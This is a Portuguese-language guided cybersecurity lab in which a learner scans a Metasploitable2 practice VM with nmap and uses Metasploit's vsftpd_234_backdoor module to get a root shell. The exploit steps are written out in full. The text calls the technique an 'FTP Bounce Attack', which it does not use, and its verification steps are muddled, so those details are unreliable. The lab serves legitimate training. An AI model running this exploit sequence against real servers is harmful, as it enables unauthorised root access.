Explorar Vulnerabilidades do Serviço FTP com Nmap e Metasploit

NmapBeginner
Pratique Agora

Introdução

Neste laboratório, você aprenderá como explorar vulnerabilidades no serviço File Transfer Protocol (FTP) para obter acesso não autorizado a uma máquina alvo. O cenário é definido em um contexto de segurança cibernética, onde você assumirá o papel de um hacker ético encarregado de identificar e explorar vulnerabilidades em um servidor FTP vulnerável.

O objetivo deste laboratório é obter acesso root à máquina alvo Metasploitable2, aproveitando uma vulnerabilidade do serviço FTP e utilizando o Metasploit Framework, uma ferramenta popular de teste de penetração. Através desta experiência prática, você obterá uma compreensão mais profunda do FTP Bounce Attack, técnicas de varredura de portas (port scanning) e do processo de exploração usando o Metasploit.

Este é um Lab Guiado, que fornece instruções passo a passo para ajudá-lo a aprender e praticar. Siga as instruções cuidadosamente para completar cada etapa e ganhar experiência prática. Dados históricos mostram que este é um laboratório de nível iniciante com uma taxa de conclusão de 91%. Recebeu uma taxa de avaliações positivas de 95% dos estudantes.

Configurar o Ambiente do Laboratório

Nesta etapa, você configurará o ambiente do laboratório, que consiste em duas máquinas virtuais: a máquina Kali Linux como o atacante e a máquina Metasploitable2 como o alvo.

  1. Inicie a máquina virtual Metasploitable2 executando o seguinte comando no terminal:
sudo virsh start Metasploitable2

Aguarde o início da máquina alvo, pode levar de 1 a 3 minutos.

  1. Verifique se a máquina Metasploitable2 está em execução fazendo ping nela:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

  1. Inicie o container Kali Linux e entre em seu shell bash:
docker run -ti --network host b5b709a49cd5 bash
  1. Teste a conectividade de rede entre o container Kali Linux e a máquina Metasploitable2:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

Agora, tanto a máquina de ataque quanto a máquina alvo estão em execução, e você pode iniciar o teste de penetração.

Observação: Se você sair acidentalmente do bash atual, o container Kali irá parar automaticamente. Você pode executar docker run -ti --network host b5b709a49cd5 bash novamente no host para iniciar um novo container Kali e entrar no bash para continuar o experimento.

Realizar a Varredura de Portas

Nesta etapa, você usará a ferramenta de varredura Nmap para identificar portas abertas e serviços em execução na máquina alvo Metasploitable2.

  1. Inicie o serviço de banco de dados PostgreSQL, que é necessário pelo Metasploit:
service postgresql start
  1. Inicialize o banco de dados do Metasploit:
msfdb init
  1. Inicie o console do Metasploit Framework:
cd ~
msfconsole
  1. Use o Nmap para escanear a máquina alvo e identificar portas abertas:
nmap -sV -T4 192.168.122.102

A opção -sV habilita a detecção de versão para portas abertas, e -T4 define a política de tempo para uma varredura mais rápida.

Pressione Ctrl+D para sair do console do Metasploit e então iniciar a inspeção

Explorar a Vulnerabilidade do Serviço FTP

Nesta etapa, você aproveitará a vulnerabilidade do serviço FTP identificada para obter acesso não autorizado à máquina alvo Metasploitable2.

  1. Primeiramente, se você não estiver no console do Metasploit, deverá iniciar o console do Metasploit:
cd ~
msfconsole
  1. Pesquise por um módulo de scanner FTP no Metasploit:
search scanner/ftp
  1. Use o módulo ftp_version para escanear o serviço FTP:
use auxiliary/scanner/ftp/ftp_version
  1. Defina o host alvo para a varredura:
set RHOSTS 192.168.122.102
  1. Execute a varredura de versão do FTP:
exploit
  1. Com base na versão do FTP identificada, pesquise por um módulo de exploração correspondente:
search vsFTPd
  1. Use o módulo vsftpd_234_backdoor para explorar a vulnerabilidade:
use exploit/unix/ftp/vsftpd_234_backdoor
  1. Defina o host alvo para a exploração:
set RHOST 192.168.122.102
  1. Execute a exploração:
exploit

Pressione Ctrl+D para sair do console do Metasploit e então iniciar a inspeção

Verificar a Exploração Bem-Sucedida

Nesta etapa, você verificará se a exploração foi bem-sucedida e se obteve acesso root à máquina alvo Metasploitable2.

  1. Primeiramente, se você não estiver no console do Metasploit, deverá iniciar o console do Metasploit:
cd ~
msfconsole
  1. Verifique o usuário atual:
whoami
  1. Verifique o nome do host da máquina comprometida:
hostname
  1. Verifique o endereço IP da máquina comprometida:
ifconfig

Pressione Ctrl+D para sair do console do Metasploit e então iniciar a inspeção

Resumo

Neste laboratório, você aprendeu como explorar uma vulnerabilidade do serviço FTP para obter acesso não autorizado a uma máquina alvo. Você configurou um ambiente de laboratório com uma máquina Metasploitable2 vulnerável e uma máquina de ataque Kali Linux. Você realizou a varredura de portas usando o Nmap para identificar portas e serviços abertos e, em seguida, aproveitou o Metasploit Framework para explorar uma vulnerabilidade identificada no serviço FTP. Por fim, você verificou a exploração bem-sucedida verificando o usuário atual, o nome do host e o endereço IP da máquina comprometida.

Através desta experiência prática, você adquiriu conhecimento e habilidades práticas na identificação e exploração de vulnerabilidades, no uso de ferramentas populares de segurança cibernética como Nmap e Metasploit, e na compreensão da técnica de Ataque FTP Bounce. Essas habilidades são essenciais para hackers éticos e profissionais de segurança cibernética para avaliar e fortalecer a postura de segurança de sistemas e redes.